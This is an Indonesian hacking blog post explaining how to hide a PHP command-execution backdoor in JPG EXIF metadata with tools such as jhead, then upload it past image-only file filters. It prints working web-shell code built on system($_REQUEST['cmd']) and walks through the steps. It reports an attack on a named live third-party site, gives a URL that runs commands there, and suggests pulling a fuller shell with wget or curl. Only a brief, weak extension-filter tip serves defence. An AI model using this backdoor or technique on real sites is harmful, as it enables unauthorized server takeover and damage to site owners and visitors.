Trik Inject PHP Script ke File Gambar (Jpg, Png, etc)

Cara manipulasi backdoor ke jpg, Cara manipulasi backdoor php ke jpg, Cara manipulasi malicious php script ke jpg, Cara inject php file ke jpg, Trik Inject PHP Script ke File Gambar, Cara menggunakan exif tool, Cara manipulasi php file ke gambar dengan exif tool, Inject php file to image, jpg, png, cara menyelipkan script backdoor ke file gambar, cara menyelipkan script backdoor ke file gambar 2016, cara menyelipkan script backdoor ke file gambar 2017

[UPDATED 15.10.2016 19:16:55]

Holaa sobat setia yuzanotes dimanapun berada,
gmna kabarnya hari ini, semoga sehat selalu ya.
Seperti pada judul kali ini gw mo mbahas trik lama, namun msih belum banyak yang tau.

Oke langsung saja ke pokok permasalahan.
Pernah nggak sih agan ketemu dengan form file upload, tapi hanya memperbolehkan file image only? pasti pernah kan, kebanyakan orang mungkin make teknik tamper data atau bisa juga make live http header, tapi cara ini tidak 100% work.

Nah pada tutor kali ini gw mw share cara manipulasi backdoor ke file jpg,
ya walaupun dengan cara ini tidak mnjamin 100% backdoor akan terupload juga :'v , setidaknya nambah wawasan agan-sista pembaca dsini, mengenai method upload shell backdoor ^_^

PERSIAPAN :
1. Target
2. Niat

Windows :
- Quick EXIF Editor ( download disini ; pass: yuzan0tes )
- Exif Pilot
NOTE :  pada tutorial ini gw make Quick EXIF Editor

Linux :
- Exif (apt-get install exif)
- Exiv2 (apt-get install exiv2)
- Jhead (apt-get install jhead)
NOTE : install salah satu saja, pada tutorial kali ini gw make jhead (jpg only)

Code PHP Inject
Plain Text
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo 'HELLO WORLD
';}__halt_compiler();?></h1>
With Image
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="LINK GAMBAR" border=0>
';}__halt_compiler();?></h1>

LANGKAH-LANGKAH MANIPULASI :

WINDOWS
1. Download toolnya dulu (diatas)
Penampakan tool
2. Siapin gambar yang mau di inject
3. Buka toolnya, klik "Open" lalu pilih gambarnya
4. Klik tanda +

Klik "Yes" sadjha :'''v
5. Ubah Type dan Value, Samakan seperti ini, Value isi bebas terserah. Kalo udah klik Add
6. Klik pada pending change, lihat gambar dibawah
7. Klik di "New value" terus "Edit Modification"
8. Nah sampe sini, tinggal ganti New value dengan Code PHP Inject, dan konfigurasi dikit, lihat gambar di bawah

Cara cek code php inject sudah masuk atau belum
1. Open with text editor, gw make notepad++
 2. Nah kalo udah kek gini brarti sudah ke inject ^_^

Tes di localhost
1. Nah bisaa kan :'''v
2. Ini gw make IIS7, gini penampakannya


LINUX
1. jhead -h = bwat lihat command dasarnya
2. Siapkan gambarnya (.jpg) *cari di gugel njing :'''v
3. lakukan command ini: jhead -purejpg filemu.jpg . fungsinya untuk menghapus comment, info, tag bawaan gambar
4. Sekarang kita sisipkan file php dengan command: jhead -ce filemu.jpg
Seteleh itu akan muncul default text editor VI
Masukkan salah satu Code PHP Inject yg sudah gw sediain di atas
Screenshot:

Setelah itu save. Jika sukses, muncul "Modified: filemu.jpg"
5. Cek script, sudah masuk atau belum, dengan command: jhead filemu.jpg
Klo result begini berarti sukses
6. Selanjutnya rename filenya ke .php , lalu upload ke Tergetmu
*Ingat cara ini tidak 100% bisa


EKSEKUSI TARGET :
1. Gw dah punya live target,
Screenshot:
2. Oke, kita coba test dulu dengan file php uploader biasa
Screenshot:
3. Daaaann, gagal --__--
Screenshot:
4. Sekarang waktunya beraksi, siapkan file .php yang tadi sudah di inject tadi, lalu upload, daaan
crooots.. file uploaded yeah :''v
Screenshot:
5. Buka filenya, dan jangan kaget kalo yang muncul gambar doang *btw ini namanya Mia Khalifa :'''v
Screenshot:
Cara Penggunaan :
1. Cara melihat isi direktori supaya bisa tersusun rapi, seperti ini:
view-source:http://www.wtinntal.at/import/mia.php?cmd=ls -la
2. Upload shell, gunakan fungsi wget, curl, atau cara lain (karena tdak smua web support wget)

3. Setelah itu terserah mau diapain itu web :)

CATATAN :
Gunakan command sesuai os server yg di pakai webnya, kalo linux make command linux kalo windows ya windows :'''v
intinya hanya perlu menjalankan command: SITE.COM/filemu.php?cmd=PERINTAH
?cmd= > Harus diawali dengan ini
PERINTAH > Sesuaikan dengan os yg dipakai server, pelajari command" dasarnya juga *Cari referensi di google

Bagi yang pengen langsung jadi / gak mau repot, ini file jpg yang sudah di inject php script bisa di download disini

Cara Menghindari Trik ini Untuk Web Developer
Inti dari trik ini adalah memanipulasi file php menjadi jpg (image/gambar)
jika agan developer salah satu web, agan hanya perlu menambahkan filter exstensi saja,
jadi, kurang lebih seperti ini :
*sesuaikan dengan keperluan di web agan, d bwah ini hanya .jpg, .jpeg, .png & .gif
[// Code Filter extensi by m1x
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Maaf bosq, hanya .jpg, .jpeg, .png & .gif files saja yang diperbolehkan.";
    $uploadOk = 0;
}]

Sampe sini dulu tutor hari ini,
Semoga Bermanfaat ^_^

COMMENTS

BLOGGER: 18
Loading...
Name

Exploit,18,Movie,6,PHP Webshell,6,Scampage,8,Underground,77,
ltr
item
Yuzaside: Trik Inject PHP Script ke File Gambar (Jpg, Png, etc)
Trik Inject PHP Script ke File Gambar (Jpg, Png, etc)
Cara manipulasi backdoor ke jpg, Cara manipulasi backdoor php ke jpg, Cara manipulasi malicious php script ke jpg, Cara inject php file ke jpg, Trik Inject PHP Script ke File Gambar, Cara menggunakan exif tool, Cara manipulasi php file ke gambar dengan exif tool, Inject php file to image, jpg, png, cara menyelipkan script backdoor ke file gambar, cara menyelipkan script backdoor ke file gambar 2016, cara menyelipkan script backdoor ke file gambar 2017
https://3.bp.blogspot.com/-ZywvCZwwQDc/V_yOjihS4SI/AAAAAAAABKU/iuLqTOemzpAEPRtEj2wI0MJREHgR4bojwCLcB/s400/logoinject.png
https://3.bp.blogspot.com/-ZywvCZwwQDc/V_yOjihS4SI/AAAAAAAABKU/iuLqTOemzpAEPRtEj2wI0MJREHgR4bojwCLcB/s72-c/logoinject.png
Yuzaside
http://blog.yuzaside.com/2016/10/trik-inject-php-script-ke-file-gambar.html
http://blog.yuzaside.com/
http://blog.yuzaside.com/
http://blog.yuzaside.com/2016/10/trik-inject-php-script-ke-file-gambar.html
true
1835467259161587483
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy